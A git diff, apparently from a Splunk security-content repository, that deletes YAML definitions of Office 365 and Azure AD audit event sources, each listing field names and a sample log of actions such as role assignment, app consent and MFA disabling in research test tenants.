-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-10-20T16:50:46", "Id": "30a8b107-b190-406c-9b80-c3f5c3a29129", "Operation": "Add member to role.", "OrganizationId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "lowpriv@splunkresearch.onmicrosoft.com", "UserId": "attacker@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory", "Value": "Role"}], "ModifiedProperties": [{"Name": "Role.ObjectID", "NewValue": "0ee19da2-ee3d-4743-ae53-8cb79599c384", "OldValue": ""}, {"Name": "Role.DisplayName", "NewValue": "Company Administrator", "OldValue": ""}, {"Name": "Role.TemplateId", "NewValue": "62e90394-69f5-4237-9190-012177145e10", "OldValue": ""}, {"Name": "Role.WellKnownObjectName", "NewValue": "TenantAdmins", "OldValue": ""}], "Actor": [{"ID": "attacker@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "Microsoft Office 365 Portal", "Type": 1}, {"ID": "00000006-0000-0ff1-ce00-000000000000", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5", "InterSystemsId": "6a6b4dfe-8b77-49db-9999-510115d1f3dd", "IntraSystemId": "c36bfbae-b287-415b-bc14-ab5c3a9248d7", "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "lowpriv@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9", "Type": 3}], "TargetContextId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5"}'
diff --git a/data_sources/cloud/event_sources/O365_Add_owner_to_application.yml b/data_sources/cloud/event_sources/O365_Add_owner_to_application.yml
deleted file mode 100644
index 5d86c6264c..0000000000
--- a/data_sources/cloud/event_sources/O365_Add_owner_to_application.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: O365 Add owner to application.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-09-07T13:42:04", "Id": "6e2c723b-8f6e-47f4-8c60-fa23ef3fccee", "Operation": "Add owner to application.", "OrganizationId": "48203edf-5d2c-45f2-8123-a368cc8b0e51", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "user2@contoso.onmicrosoft.com", "UserId": "user@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\"}"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}], "ModifiedProperties": [{"Name": "Application.ObjectID", "NewValue": "a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "OldValue": ""}, {"Name": "Application.DisplayName", "NewValue": "TestApp2", "OldValue": ""}, {"Name": "Application.AppId", "NewValue": "95106c0e-3519-450e-8e38-7f326d873454", "OldValue": ""}], "Actor": [{"ID": "user@contoso.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "48203edf-5d2c-45f2-8123-a368cc8b0e51", "InterSystemsId": "3f6a58c5-2fba-401d-b137-82b860830213", "IntraSystemId": "e8034ddc-0ca3-4aca-996c-1dc6dee48679", "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "user2@contoso.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9", "Type": 3}], "TargetContextId": "48203edf-5d2c-45f2-8123-a368cc8b0e51"}'
diff --git a/data_sources/cloud/event_sources/O365_Add_service_principal.yml b/data_sources/cloud/event_sources/O365_Add_service_principal.yml
deleted file mode 100644
index 85d80ff74a..0000000000
--- a/data_sources/cloud/event_sources/O365_Add_service_principal.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: O365 Add service principal.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src_user
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2024-02-07T22:31:14", "Id": "f624ed92-b4a2-4d42-aa8b-20a261d06b7f", "Operation": "Add service principal.", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "UserId": "user30@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\",\"AppId\":\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"}"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties": [{"Name": "AccountEnabled", "NewValue": "[\r\n true\r\n]", "OldValue": "[]"}, {"Name": "AppPrincipalId", "NewValue": "[\r\n \"e06366ca-8489-4748-b6a2-d7e4332f45c1\"\r\n]", "OldValue": "[]"}, {"Name": "DisplayName", "NewValue": "[\r\n \"Malicious11\"\r\n]", "OldValue": "[]"}, {"Name": "ServicePrincipalName", "NewValue": "[\r\n \"e06366ca-8489-4748-b6a2-d7e4332f45c1\"\r\n]", "OldValue": "[]"}, {"Name": "Credential", "NewValue": "[\r\n {\r\n \"CredentialType\": 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n }\r\n]", "OldValue": "[]"}, {"Name": "Included Updated Properties", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "NewValue": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "OldValue": ""}], "Actor": [{"ID": "user30@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": 
"e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "InterSystemsId": "ea473f15-64b3-435a-a885-6ee3908919e2", "IntraSystemId": "00000000-0000-0000-0000-000000000000", "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_2dedf863-ac93-4f45-87b3-e32f48145380", "Type": 2}, {"ID": "2dedf863-ac93-4f45-87b3-e32f48145380", "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}, {"ID": "Malicious11", "Type": 1}, {"ID": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "Type": 2}, {"ID": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "Type": 4}], "TargetContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4"}'
diff --git a/data_sources/cloud/event_sources/O365_Change_user_license.yml b/data_sources/cloud/event_sources/O365_Change_user_license.yml
deleted file mode 100644
index 362d8b335a..0000000000
--- a/data_sources/cloud/event_sources/O365_Change_user_license.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: O365 Change user license.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src_user
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-09-11T15:55:46", "Id": "1e39f32d-081d-4494-994a-533b57f91df7", "Operation": "Change user license.", "OrganizationId": "bbad9541-eb53-4533-bcef-2b76182c3b75", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "victimUser@splunkresearch.onmicrosoft.com", "UserId": "evilUser@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"id\":\"64c07906-cb25-4d37-b38c-a862f2e49671\",\"seq\":\"6\",\"b\":\"://admin.microsoft.com;https://wusportalprv.office.com;https://auth.microsoftonline.com;https://portal.office.com;https://portal-sdf.office.com/;https://portal.office.com/;https://cp.portal.office.com/;https://scuportalprv.office.com;https://ncuportalprv.office.com;https://ncuportal.office.com;https://weuportal.office.com;https://eusportal.office.com;https://neuportal.office.com;https://scuportal.office.com;https://seaportal.office.com;https://wusportal.office.com;https://easportal.office.com;https://wjpportal.office.com;https://ejpportal.office.com;https://nukportal.office.com;https://sukportal.office.com;https://admin-ignite.microsoft.com;https://admin-sdf.microsoft.com;https://wukportal.office.com/\\\\\\\"},{\\\\\\\"Name\\\\\\\":\\\\\\\"SPN\\\\\\\",\\\\\\\"OldValue\\\\\\\":null,\\\\\\\"NewValue\\\\\\\":\\\\\\\"Microsoft.Office365Portal;00000006-0000-0ff1-ce00-000000000000;00000006-0000-0ff1-ce00-000000000000/portal.microsoftonline.com;https://ncuportalprv-staging.office.com;https://scuportalprv-staging.office.com;https://admin.microsoft365.com;https://portal-sdf.apps.mil/;https://portal-sdf.apps.mil;https://portal.apps.mil/;https://portal.apps.mil;https://portal-sdf.office365.us/;https://portal-sdf.office365.us;https://portal.office365.us/;https://portal.office365.us;https://portal.microsoft.com;https://admin.microsoft.com;https
://wusportalprv.office.com;https://auth.microsoftonline.com;https://portal.office.com;https://portal-sdf.office.com/;https://portal.office.com/;https://cp.portal.office.com/;https://scuportalprv.office.com;https://ncuportalprv.office.com;https://ncuportal.office.com;https://weuportal.office.com;https://eusportal.office.com;https://neuportal.office.com;https://scuportal.office.com;https://seaportal.office.com;https://wusportal.office.com;https://easportal.office.com;https://wjpportal.office.com;https://ejpportal.office.com;https://nukportal.office.com;https://sukportal.office.com;https://admin-ignite.microsoft.com;https://admin-sdf.microsoft.com;https://wukportal.office.com/\\\\\\\"}]\\\",\\\"additionalDetails\\\":\\\"{\\\\\\\"User-Agent\\\\\\\":\\\\\\\"O365AdminPortal\\\\\\\"}\\\"}\",\"c\":\"6\"}"}, {"Name": "extendedAuditEventCategory", "Value": "User"}], "ModifiedProperties": [], "Actor": [{"ID": "evilUser@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "Microsoft Office 365 Portal", "Type": 1}, {"ID": "00000006-0000-0ff1-ce00-000000000000", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "bbad9541-eb53-4533-bcef-2b76182c3b75", "InterSystemsId": "0817f79e-f0ea-4518-9c21-7babc9a36a79", "IntraSystemId": "6ae5503d-8764-4f6f-9547-668f4b2f82ca", "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "victimUser@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9", "Type": 3}], "TargetContextId": "bbad9541-eb53-4533-bcef-2b76182c3b75"}'
diff --git a/data_sources/cloud/event_sources/O365_Consent_to_application.yml b/data_sources/cloud/event_sources/O365_Consent_to_application.yml
deleted file mode 100644
index a2c04989c2..0000000000
--- a/data_sources/cloud/event_sources/O365_Consent_to_application.yml
+++ /dev/null
@@ -1,68 +0,0 @@
-event_name: O365 Consent to application.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- additionalDetails
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-09-05T21:05:31", "Id": "5822e126-1fbc-4269-9ad6-4c1879cdbcf3", "Operation": "Consent to application.", "OrganizationId": "9c00a473-1b2c-4bc2-9215-84df3f57aee5", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "95106c0e-3519-450e-8e38-7f326d873454", "UserId": "attacker@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\"AppId\":\"95106c0e-3519-450e-8e38-7f326d873454\"}"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "NewValue": "True", "OldValue": ""}, {"Name": "ConsentContext.IsAppOnly", "NewValue": "False", "OldValue": ""}, {"Name": "ConsentContext.OnBehalfOfAll", "NewValue": "True", "OldValue": ""}, {"Name": "ConsentContext.Tags", "NewValue": "", "OldValue": ""}, {"Name": "ConsentAction.Permissions", "NewValue": "[] => [[Id: r2KtIS6Zn0q2wWeqbIputLSZcc5Sj_NGtUtP2B3pYeI, ClientId: 21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4, PrincipalId: , ResourceId: ce7199b4-8f52-46f3-b54b-4fd81de961e2, ConsentType: AllPrincipals, Scope: User.Read, CreatedDateTime: , LastModifiedDateTime ]]; ", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "NewValue": "95106c0e-3519-450e-8e38-7f326d873454", "OldValue": ""}], "Actor": [{"ID": "attacker@contoso.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "9c00a473-1b2c-4bc2-9215-84df3f57aee5", "InterSystemsId": 
"e0fb6206-12db-4fdf-bf52-699b254124d3", "IntraSystemId": "897d35e6-e2dc-455e-ba65-e6d58adae01f", "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4", "Type": 2}, {"ID": "21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4", "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}, {"ID": "TestApp2", "Type": 1}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454", "Type": 2}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454", "Type": 4}], "TargetContextId": "9c00a473-1b2c-4bc2-9215-84df3f57aee5"}'
diff --git a/data_sources/cloud/event_sources/O365_Disable_Strong_Authentication.yml b/data_sources/cloud/event_sources/O365_Disable_Strong_Authentication.yml
deleted file mode 100644
index e61a782ac6..0000000000
--- a/data_sources/cloud/event_sources/O365_Disable_Strong_Authentication.yml
+++ /dev/null
@@ -1,69 +0,0 @@
-event_name: O365 Disable Strong Authentication.
-fields:
-- _time
-- ActorContextId
-- ActorIpAddress
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- ClientIP
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- additionalDetails
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- extendedAuditEventCategory
-- extended_properties
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"Actor": [{"ID": "rodsoto@rodsoto.onmicrosoft.com", "Type": 5}, {"ID": "10037FFEA938FB92", "Type": 3}, {"ID": "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "ActorIpAddress": "", "AzureActiveDirectoryEventType": 1, "ClientIP": "", "CreationTime": "2020-12-15T22:35:20", "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory", "Value": "User"}], "Id": "a5aea9c5-b879-495a-b764-119b2bd54d80", "InterSystemsId": "9d18b521-23df-4130-99e2-1ff2eee13333", "IntraSystemId": "7d96ab40-6e16-48e5-bf78-677c89683775", "ModifiedProperties": [{"Name": "StrongAuthenticationRequirement", "NewValue": "[]", "OldValue": "[\r\n {\r\n \"RelyingParty\": \"*\",\r\n \"State\": 0,\r\n \"RememberDevicesNotIssuedBefore\": \"2020-12-15T20:47:57+00:00\"\r\n }\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "StrongAuthenticationRequirement", "OldValue": ""}], "ObjectId": "rodsoto@rodsoto.onmicrosoft.com", "Operation": "Disable Strong Authentication.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID": "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "rodsoto@rodsoto.onmicrosoft.com", "Type": 5}, {"ID": "10037FFEA938FB92", "Type": 3}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "UserId": "rodsoto@rodsoto.onmicrosoft.com", "UserKey": "10037FFEA938FB92@rodsoto.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
diff --git a/data_sources/cloud/event_sources/O365_MailItemsAccessed.yml b/data_sources/cloud/event_sources/O365_MailItemsAccessed.yml
deleted file mode 100644
index 5bddc5d467..0000000000
--- a/data_sources/cloud/event_sources/O365_MailItemsAccessed.yml
+++ /dev/null
@@ -1,65 +0,0 @@
-event_name: O365 MailItemsAccessed
-fields:
-- _time
-- AppId
-- ClientAppId
-- ClientIPAddress
-- ClientInfoString
-- CreationTime
-- ExternalAccess
-- Folders{}.FolderItems{}.InternetMessageId
-- Folders{}.FolderItems{}.SizeInBytes
-- Folders{}.Id
-- Folders{}.Path
-- Id
-- InternalLogonType
-- IsThrottled
-- LogonType
-- LogonUserSid
-- MailAccessType
-- MailboxGuid
-- MailboxOwnerSid
-- MailboxOwnerUPN
-- Operation
-- OperationCount
-- OperationProperties{}.Name
-- OperationProperties{}.Value
-- OrganizationId
-- OrganizationName
-- OriginatingServer
-- RecordType
-- ResultStatus
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc
-- host
-- index
-- linecount
-- punct
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2024-02-01T16:07:34", "Id": "9cef02e9-4bfa-4c73-be7d-9dad68b9cea8", "Operation": "MailItemsAccessed", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 50, "ResultStatus": "Succeeded", "UserKey": "100320030DF47B14", "UserType": 0, "Version": 1, "Workload": "Exchange", "UserId": "user15@splunkresearch.onmicrosoft.com", "AppId": "47629505-c2b6-4a80-adb1-9b3a3d233b7b", "ClientAppId": "47629505-c2b6-4a80-adb1-9b3a3d233b7b", "ClientIPAddress": "120.1.121.35", "ClientInfoString": "Client=WebServices;ExchangeWebServicesProxy/CrossSite/EXCH/15.20.7249.024/python-requests/2.25.1[AppId=47629505-c2b6-4a80-adb1-9b3a3d233b7b];", "ExternalAccess": false, "InternalLogonType": 0, "LogonType": 0, "LogonUserSid": "S-1-5-21-1148582062-3132321681-773847816-49307764", "MailboxGuid": "7cfcc8fc-0d4a-4e1c-9592-dbb3de1e3859", "MailboxOwnerSid": "S-1-5-21-1148582062-3132321681-773847816-49307764", "MailboxOwnerUPN": "user15@splunkresearch.onmicrosoft.com", "OperationProperties": [{"Name": "MailAccessType", "Value": "Bind"}, {"Name": "IsThrottled", "Value": "False"}], "OrganizationName": "splunkresearch.onmicrosoft.com", "OriginatingServer": "CH0PR18MB5530 (15.20.4200.000)\r\n", "Folders": [{"FolderItems": [{"InternetMessageId": "", "SizeInBytes": 44329}, {"InternetMessageId": "", "SizeInBytes": 44304}, {"InternetMessageId": "", "SizeInBytes": 44572}, {"InternetMessageId": "", "SizeInBytes": 245068}], "Id": "LgAAAAC0AxwgOj/BRq9Bs1bhMPw/AQDh+UNSDzeHSLWfq+fr83BDAAAAAAEMAAAB", "Path": "\\Inbox"}], "OperationCount": 4}'
diff --git a/data_sources/cloud/event_sources/O365_ModifyFolderPermissions.yml b/data_sources/cloud/event_sources/O365_ModifyFolderPermissions.yml
deleted file mode 100644
index 6f4b11f4f0..0000000000
--- a/data_sources/cloud/event_sources/O365_ModifyFolderPermissions.yml
+++ /dev/null
@@ -1,83 +0,0 @@
-event_name: O365 ModifyFolderPermissions
-fields:
-- _time
-- AppId
-- ClientIP
-- ClientIPAddress
-- ClientInfoString
-- CreationTime
-- ExternalAccess
-- Id
-- InternalLogonType
-- Item.Id
-- Item.ParentFolder.Id
-- Item.ParentFolder.MemberRights
-- Item.ParentFolder.MemberSid
-- Item.ParentFolder.MemberUpn
-- Item.ParentFolder.Name
-- Item.ParentFolder.Path
-- LogonType
-- LogonUserSid
-- MailboxGuid
-- MailboxOwnerSid
-- MailboxOwnerUPN
-- Operation
-- OrganizationId
-- OrganizationName
-- OriginatingServer
-- RecordType
-- ResultStatus
-- SessionId
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- app
-- authentication_service
-- change_type
-- client_info_str
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- eventtype
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- object_id
-- punct
-- record_type
-- result
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- status
-- tag
-- tag::eventtype
-- tenant_id
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-09-07T18:19:07", "Id": "ff065c17-e638-4013-20ab-08dbafceeca1", "Operation": "ModifyFolderPermissions", "OrganizationId": "e17879dd-24ec-44a6-be92-9dcbf6969220", "RecordType": 2, "ResultStatus": "Succeeded", "UserKey": "10032002CC029AE9", "UserType": 0, "Version": 1, "Workload": "Exchange", "ClientIP": "22.23.21.25", "UserId": "user1@contoso.onmicrosoft.com", "AppId": "00000002-0000-0ff1-ce00-000000000000", "ClientIPAddress": "22.23.21.25", "ClientInfoString": "Client=OWA;Action=ViaProxy", "ExternalAccess": false, "InternalLogonType": 0, "LogonType": 0, "LogonUserSid": "S-1-5-21-1148582062-3132321681-773847816-45339891", "MailboxGuid": "8e942cc1-73d8-4483-9def-7d9579d615a7", "MailboxOwnerSid": "S-1-5-21-1148582062-3132321681-773847816-45339891", "MailboxOwnerUPN": "user1@contoso.onmicrosoft.com", "OrganizationName": "contoso.onmicrosoft.com", "OriginatingServer": "BYAPR18MB2728 (15.20.4200.000)\r\n", "SessionId": "d2a5a3ba-992b-431a-9b52-8c76210d17d9", "Item": {"Id": "LgAAAABKe+NY5HVjRYWDqaJ5IKKFAQBQ11dzmT6LS6bQbkNDtISsAAAAAAEMAAAB", "ParentFolder": {"Id": "LgAAAABKe+NY5HVjRYWDqaJ5IKKFAQBQ11dzmT6LS6bQbkNDtISsAAAAAAEMAAAB", "MemberRights": "FreeBusySimple", "MemberSid": 